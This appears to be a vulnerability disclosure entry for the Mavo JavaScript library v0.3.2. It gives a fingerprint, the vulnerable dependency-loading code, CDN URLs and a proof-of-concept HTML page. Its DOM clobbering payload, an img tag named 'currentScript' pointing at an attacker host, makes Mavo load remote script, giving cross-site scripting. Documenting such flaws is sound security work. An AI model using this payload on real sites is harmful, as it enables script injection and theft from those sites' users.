- Library: Mavo
- Stars: 2.8K
- Version: v0.3.2
- Fingerprint:
typeof Mavo !== 'undefined' && Mavo.hasOwnProperty('Plugins')
- Payload:
<img name="currentScript" src="https://attack.hulk"></img>
- Impact: XSS
- Status: Reported
- CVE: CVE-2024-53388
- Foundby: TheHulk
https://github.com/mavoweb/mavo
URL:
https://cdnjs.cloudflare.com/ajax/libs/mavo/0.3.2/mavo.es5.js
https://cdnjs.cloudflare.com/ajax/libs/mavo/0.3.2/mavo.es5.min.js
https://cdnjs.cloudflare.com/ajax/libs/mavo/0.3.2/mavo.js
https://cdnjs.cloudflare.com/ajax/libs/mavo/0.3.2/mavo.min.js
https://cdn.jsdelivr.net/npm/[email protected]/dist/mavo.min.js
if (o.dependencies) {
let base = document.currentScript? document.currentScript.src : location;
let dependencies = o.dependencies.map(url => Mavo.load(url, base));
ready.push(...dependencies);
}
<!--Library-->
<script src="https://get.mavo.io/stable/mavo.js"></script>
<link rel="stylesheet" href="https://get.mavo.io/stable/mavo.css">
<script>
(function ($, $$) {
Mavo.Plugins.register("myplugin", {
dependencies: ["a.js"],
});
})(Bliss, Bliss.$);
</script>
<!--Library-->
<!--Payload-->
<img name=currentScript src="http://localhost:9999"></img>
<!--Payload-->